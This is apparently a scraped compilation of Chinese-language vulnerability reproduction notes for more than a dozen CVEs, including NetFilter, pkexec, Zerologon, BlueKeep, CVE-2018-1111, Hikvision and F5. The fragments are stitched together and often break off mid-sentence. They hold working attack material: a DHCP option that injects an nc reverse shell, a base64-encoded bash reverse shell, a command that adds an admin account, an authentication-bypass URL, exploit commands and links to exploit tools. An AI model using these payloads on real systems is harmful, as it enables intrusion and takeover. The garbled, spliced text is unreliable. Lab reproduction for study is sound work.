[漏洞名称]:CVE-2023-32233 NetFilter权限提升 [漏洞描述]:由研究人员 Patryk Sondej (波兰)和 Piotr Krysiuk(爱尔兰)发现,Linux 内核的 poc二进制文件: 输入:gcc -Wall -o exploit exploit.c -lmnl -lnftnl 如果觉得以上太困难 个人推荐去大佬的环境下载地址,里面有做好的镜像,可以直接进行下面复现过程 pwd=8888 [复现过程]: 输入命令:cd ~ ls 查看根目录: 执行编译好的exp文件: . /exp 成功得到root权限: [参考资料]: Liuk3r/CVE-2023-32233:CVE-2023-32233:Linux内核中的安全漏洞CVE-2023-32233 (github.com ) CVE漏洞复现-CVE-2023-32233 NetFilter权限提升-CSDN博客 CVE-2023-32233 (LINUX内核权限提升漏洞)_cve-2023 提权-CSDN博客
作者-ohh 本次测试环境为w7 1.cve-2019-1388利用工具:https://github.com/jas502n/CVE-2019-1388 cve-2019-1388提权影响范围如下: 2.cve-2019-0803利用工具: https://github.com/k8gege/K8tools/blob/master/CVE-2019-0803.exe 漏洞影响范围: ? cve-2019-0803 cmd “net user admin999 admin /add” ?
近日,红帽官方发布了安全更新,修复了编号为CVE-2018-1111的远程代码执行漏洞,攻击者可以通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权限并执行任意命令。 复现 环境 kali x64 centos 7 vmware14 设置网络 断开kali和centos的网络 将kali和centos都设置成主机模式,并且关闭主机的dhcp功能 ? –dhcp-option=”252,x’&nc -e /bin/bash 10.1.1.1 1337 #” 范围 本地测试fedora28、centos7通过,而centos6,redhat5未通过(~ 福利 作为ChaMd5里最懒的逍遥自在,肯定是一键exp啦~ 代码就在下面,虽然只有一丢丢,不过总好过手输那么多命令啦! /usr/bin/python#encoding = utf-8from pwn import *import osimport sysimport time# author : xyzz@chamd5.
本文作者:Taoing(Ms08067实验室 SRSP TEAM 核心成员) Apache Log4j Server 反序列化命令执行漏洞(CVE‐2017‐5645) 一、漏洞原理 Apache 三、漏洞复现 payload 使用ysoserial生成payload,然后直接发送给your‐ip:4712端口即可。 java ‐jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE‐2017‐5645_is_succe ss" | nc your‐ip 4712 执行docker‐compose exec log4j bash进容器 可见 /tmp/CVE‐2017‐5645_is_success已成功创建: ? "bash ‐c {echo,YmFzaCAtaSA+JiAvZGV 2L3RjcC84LjIxMC4yMzUuMjQ5Lzk5ODggMD4mMQ==}|{base64,‐d}|{bash,‐i}"
cve-2021-4034复现 影响范围 exp 打码 复现 参考 cve-2021-4034复现 Linux Polkit 本地提权漏洞 cvss评分 7.8 高危 polkit的pkexec 存在本地权限提升漏洞 根据 gconv-modules 文件 指示找到 参数对应的so文件 5. mknod name {b|c} major minor mknod name {p} 创建FIFO 已命名的管道 mknod dev/null c 1 3 mknod dev/zero c 1 5 ))(*argv, None) cenv = (c_char_p * (len(envp) + 1))(*envp, None) libc.execve(cmd, cargv, cenv) # 执行 复现
近日,vBulletin 5.x爆出一个前台远程代码执行漏洞,无需登录即可触发。该论坛程序在国外的国外的用户量就类似dz论坛在国内的用户量。
-2020-1472 cd CVE-2020-1472\ pip install -r requirements.txt python zerologon_tester.py DC_NETBIOS_NAME 整个利用过程大概是下列流程 置空域控保存在AD中的密码 获取域控用户HASH 通过获取到的管理员HASH得到一个SHELL,然后连接上去导出原来计算机中本地保存的HASH 通过获取到的HASH恢复置空的域控密码 利用复现 Impacket,否则会产生如下报错报错(新版本中更新了我们利用中会用到的函数NetrServerPasswordSet2) AttributeError: module 'impacket.dcerpc.v5. 下载EXP # ~/impacket/ cd examples git clone https://github.com/dirkjanm/CVE-2020-1472 cd CVE-2020-1472 \ 置空密码 # ~impacket/examples/CVE-2020-1472 python cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP_ADDR
本文作者:\xeb\xfe(来自信安之路作者团队) 近日,红帽官方发布了安全更新,修复了编号为 CVE-2018-1111 的远程代码执行漏洞,攻击者可以通过伪造 DHCP 服务器发送响应包,攻击红帽系统 漏洞复现过程 环境准备 这里我用的测试机器系统分别是Centos 7 和 Kali 2018.2。 Centos 7 作为被攻击机,需要设置自动获取 ip 地址。 CVE2018-1111 漏洞复现到此结束~! 通过本文,大家可以学习到如何用 dnsmasq 来快速搭建一个 DNS 服务或者 DHCP 服务,并对 DHCP 服务的 option 部分值和含义有相关了解,以及学习了 CVE2018-1111 漏洞的复现及环境搭建 参考链接 DynoRoot:Red Hat DHCP 客户端命令执行漏洞 CVE-2018-1111 预警 https://www.anquanke.com/post/id/145201
CVE官方给出的提示: welcome.php页面存在SQL注入,并且这个参数是eid 打开靶场环境: 页面是一个登陆注册的界面 用户注册: 1 01@0.com 123456
CVE-2017-8464是Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
3420557312|B58548681854236C7939003B583A8078|/ 可以自行下载学习 在github上找到了k8师傅写的批量检测工具; https://github.com/k8gege/CVE -2019-0708#%E5%BE%AE%E8%BD%AF3389%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9Ecve-20190708%E6%89%B9%E9%87%8F%E6% A3%80%E6%B5%8B%E5%B7%A5%E5%85%B7 虽然说知道没有但是还是要nmap简单扫下,常规操作 ?
作者-Beginner 0x01 CVE-2017-7921漏洞复现 许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。 ? 0x02 漏洞复现: 利用Goby发现漏洞(CVE-2017-7921): ? 利用路径:/Security/users?auth=YWRtaW46MTEK 附:检索所有用户及其角色的列表 ? 2CD2xx2FWDSeries5.3.1build150410 版本至5.4.4Build161125版本; DS-2CD4x2xFWDSeries5.2.0build140721 版本至5.4.0Build160414版本; DS-2CD4xx5Series5.2.0build140721
比如Connection: close,abc在传输过程中,会把abc会从原始请求中删除,可以利用此特性进行SSRF、绕过鉴权等操作,本次漏洞成因就是Connection: Keep-alive,X-F5- 发送数据包 POST /mgmt/tm/util/bash HTTP/1.1 Host: REDACTED Content-Length: 45 Connection: Keep-Alive, X-F5- Auth-Token Cache-Control: max-age=0 X-F5-Auth-Token: vvs Authorization: Basic YWRtaW46 { "command":"
项目地址 cnsimo/CVE-2020-2551 CVE-2020-2551 weblogic iiop 反序列化漏洞 该项目的搭建脚本在10.3.6版本经过测试,12版本未测试。 使用方法 先git clone https://github.com/cnsimo/CVE-2020-2551.git克隆本项目到本地。 建议所有操作都在一台机器上复现,避免网络问题导致的复现失败! ---- 项目引用 WeblogicEnvironment CVE-2020-2551 漏洞分析参考 WebLogic WLS核心组件RCE分析(CVE-2020-2551) - 安全客,安全资讯平台 Weblogic CVE-2020-2551 IIOP协议反序列化RCE – Y4er的博客 漫谈 WebLogic-CVE-2020-2551
前不久关于RDP的0708漏洞网上一片哀嚎,今天测试复现了一下,发现攻击之后,都会使得系统蓝屏。 CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。 2003 0X2 漏洞检测 各个厂家都已经发布了检测工具,在这里,我们使用开源的检测脚本,在msf上加载即可使用,下载链接: https://github.com/zerosum0x0/CVE
2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。 Microsoft Office 2016 0x01 环境清单 WindowsServer 2008 (192.168.3.114) Office 2007 MAC OSX(192.168.3.106) 0X02 复现过程 将生成的hta文档放入WebServer根目录:http://192.168.3.106/evil.hta python webdav_exec_CVE-2017-11882.py -u http:// 我(Cobalt Strike)本地监听了一个8081端口,用来接收客户端的Shell 要生成一个rtf/doc文档,github上已有生成脚本 webdav_exec_CVE-2017-11882.py -> http://payloads.online/tools/cve-2017-11882/webdav_exec_CVE-2017-11882.py 生成rtf文档: 最后将test.rtf在目标机器上执行
本文作者:Leafer(贝塔安全实验室-核心成员) 0708千呼万唤始出来,又将是一片腥风血雨 0x01:CVE-2019-0708的危害性 Windows系列服务器于2019年5月15号,被爆出高危漏洞 0x02:复现环境 首先搭建环境,我这里使用的是win7旗舰版(家庭版升级而来),KALI自带的v5.0.45版本MSF。 /rdp/cve_2019_0708_bluekeep_rce.rb 3.使用攻击命令 使用msfconsole命令进入metasploit-framework框架 ? \ target 使用set RHOSTS 设置靶机IP 使用set RPORT 设置靶机PORT 使用set target ID数字(可选为1-4)每种都代表了机器架构 在我的复现环境中使用 -2019-0708远程桌面代码执行漏洞复现: https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961?
今天一起来看看CVE-2017-10271的复现吧~ ? ? Part.1 漏洞说明 漏洞说明 1、漏洞描述 WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序 部署CVE-2017-10271: ? 查看虚拟机状态: ? 可以看到端口映射到了7001,尝试访问: ? 成功,搭建完毕~ ? 5、启动weblogic ? 浏览器访问http://X.X.X.X:7001/console/: ? 搭建完成~ ? Part.3 漏洞复现 漏洞检测 可以直接使用工具进行漏洞检测: ? Part.5 结语 以上就是今天的全部内容了~ ? 欢迎到公众号:一名白帽的成长史分享/提问哦~
距离漏洞披露已经过了许久,现在终于有些空余时间用于学习复现这两个漏洞。 概括 CVE-2021-42278,机器账户的名称一般用$结尾,但AD并未对域内机器账户名进行验证。 利用原理:如果域内存在一台域控名为DC(机器账户为DC)的域控机,此时攻击者可利用CVE-2021-42287漏洞去申请一个机器账户,再将机器账户的sAMAccountName修改为DC。 复现过程: 手动实现 1.创建机器账户 拿到域成员权限后,利用Powermad.ps1创建机器用户 Import-Module Poweremad.ps1 New-MachineAccount -MachineAccount DC /password:******* /domain:attack.local /dc:attack.local /nowrap 注: nowrap 选项,票据不换行,便于我们导出为文件 5. evil-winrm -i 10.10.10.165 -u Administrator -H "dbf36575210cc5a38ab4050cc6a2e9aa" 关于漏洞修复 安装微软官方的:KB5008602
攻击者精心准备了一份俄文内容的员工问卷文档,该文档使用了最新的Flash 0day漏洞CVE-2018-15982和带有自毁功能的专属木马程序进行攻击,种种技术细节表明该APT组织不惜代价要攻下目标,但同时又十分小心谨慎 在发现攻击后,Adobe官方及时响应后在12月5日加急发布了新的Flash 32.0.0.101版本修复了此次的0day漏洞。 受影响版本包括: ? 下面我们就此版本进行漏洞攻击实验。 set LHOST 192.168.0.104 set RC4PASSWORD zale 接下来,我们生成攻击的程序和网页,生成脚本EXP下载地址: https://github.com/Ridter/CVE